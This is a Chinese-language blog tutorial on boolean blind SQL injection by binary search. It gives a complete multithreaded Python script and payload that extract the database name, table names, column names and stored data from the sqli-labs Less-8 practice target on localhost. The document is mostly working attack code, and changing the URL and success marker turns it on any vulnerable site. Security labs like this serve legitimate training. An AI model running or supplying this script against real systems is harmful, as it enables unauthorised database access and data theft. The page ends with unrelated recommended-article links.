利用二分法进行 SQL 盲注

什么是sql注入?

SQL 注入(SQL Injection)是一种常见的 Web 安全漏洞,攻击者可以通过构造恶意 SQL 语句来访问数据库中的敏感信息。在某些情况下,服务器不会直接返回查询结果,而是通过布尔值(True/False)或时间延迟等方式提供间接反馈,这类攻击被称为 盲注(Blind SQL Injection)

布尔盲注代码

复制代码
import requests
import concurrent.futures

def binary_search_character(url, query, index, low=32, high=127):
    while low < high:
        mid = (low + high + 1) // 2
        payload = f"1' AND ASCII(SUBSTRING(({query}),{index},1)) >= {mid} -- "
        res = {"id": payload}
        r = requests.get(url, params=res)

        if "You are in.........." in r.text:
            low = mid
        else:
            high = mid - 1

    return chr(low) if low > 32 else ''

def extract_data(url, query, max_length=200):
    extracted_data = [''] * max_length
    
    with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:
        future_to_index = {executor.submit(binary_search_character, url, query, i): i for i in range(1, max_length + 1)}
        
        for future in concurrent.futures.as_completed(future_to_index):
            index = future_to_index[future]
            try:
                result = future.result()
                if result:
                    extracted_data[index - 1] = result
                    print(f": {''.join(extracted_data).strip()}")
            except Exception as exc:
                print(f"Error extracting character {index}: {exc}")
    
    return ''.join(extracted_data).strip()

if __name__ == '__main__':
    url = 'http://127.0.0.1/sqlilabs/Less-8/index.php'
    database_name = extract_data(url, "SELECT database()")
    print(f"数据库名: {database_name}")

    table_name_query = f"SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema='{database_name}'"
    table_names = extract_data(url, table_name_query)
    print(f"表名: {table_names}")

    table_name = table_names.split(',')[0]
    column_name_query = f"SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='{table_name}' AND table_schema='{database_name}'"
    column_names = extract_data(url, column_name_query)
    print(f"列名: {column_names}")

    column_name = column_names.split(',')[1]
    data_query = f"SELECT GROUP_CONCAT({column_name}) FROM {database_name}.{table_name}"
    extracted_values = extract_data(url, data_query)
    print(f"数据: {extracted_values}")
    print(f"数据库名: {database_name}")
    print(f"表名: {table_names}")
    print(f"列名: {column_names}")
    print(f"数据: {extracted_values}")

代码主要内容

(1)二分法查找单个字符

复制代码
while low < high:
    mid = (low + high + 1) // 2
  • 采用二分查找方法,缩小可能的 ASCII 码范围。

SQL 注入 Payload:

复制代码
payload = f"1' AND ASCII(SUBSTRING(({query}),{index},1)) >= {mid} -- "
  • SUBSTRING(({query}),{index},1): 取出 SQL 结果的第 index 个字符。
  • ASCII(...): 获取该字符的 ASCII 码。
  • >= {mid}: 判断该字符的 ASCII 是否大于等于 mid

(2)并发优化数据提取

复制代码
with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:
  • 使用 ThreadPoolExecutor 并发执行多个字符的爆破,提高速度。

    future_to_index = {executor.submit(binary_search_character, url, query, i): i for i in range(1, max_length + 1)}

  • 提交多个任务,每个任务负责获取 SQL 结果中的某个字符。


攻击流程

  1. 获取数据库名

    复制代码
    database_name = extract_data(url, "SELECT database()")
  2. 获取表名

    复制代码
    table_name_query = f"SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema='{database_name}'"
  3. 获取列名

    复制代码
    column_name_query = f"SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='{table_name}' AND table_schema='{database_name}'"
  4. 提取数据

    复制代码
    data_query = f"SELECT GROUP_CONCAT({column_name}) FROM {database_name}.{table_name}"

代码优化:

1. 并发优化

  • 使用 ThreadPoolExecutor 并发执行查询,同时获取多个字符,提高数据提取效率。
  • 减少等待时间:相比单线程依次查询每个字符,多线程可以同时进行多个查询,加快数据恢复。

2. 自动化数据提取

  • 从数据库名到数据内容,全程自动化
    • 依次提取数据库名、表名、列名、数据,无需手动输入 SQL 语句,提高攻击自动化程度。

效果展示(使用sqli-labs靶场的第8关)

相关推荐
SsummerC22 分钟前
【leetcode100】括号生成
python·算法·leetcode
joke_xiaoli1 小时前
如何重置 MySQL root 用户的登录密码?
数据库·mysql
winner88811 小时前
Hive SQL 精进系列:字符串拼接的三种常用方式
hive·hadoop·sql
xcy4509228731 小时前
快手__NS_sig3数据分析
python
鹏说大数据1 小时前
MySQL连接较慢原因分析及解决措施
数据库·mysql
Python数据分析与机器学习1 小时前
《基于深度学习的高分卫星图像配准模型研发与应用》开题报告
图像处理·人工智能·python·深度学习·神经网络·机器学习
程序员总部2 小时前
PyCharm如何有效地添加源与库?
ide·python·pycharm
LCY1332 小时前
django中间件说明
python·中间件·django
蹦蹦跳跳真可爱5892 小时前
Python----数据分析(Pandas四:一维数组Series的统计计算,分组和聚合)
python·数据分析·pandas
极限实验室3 小时前
使用 INFINI Gateway 保护 Elasticsearch 集群之修改查询不合理参数(二)
数据库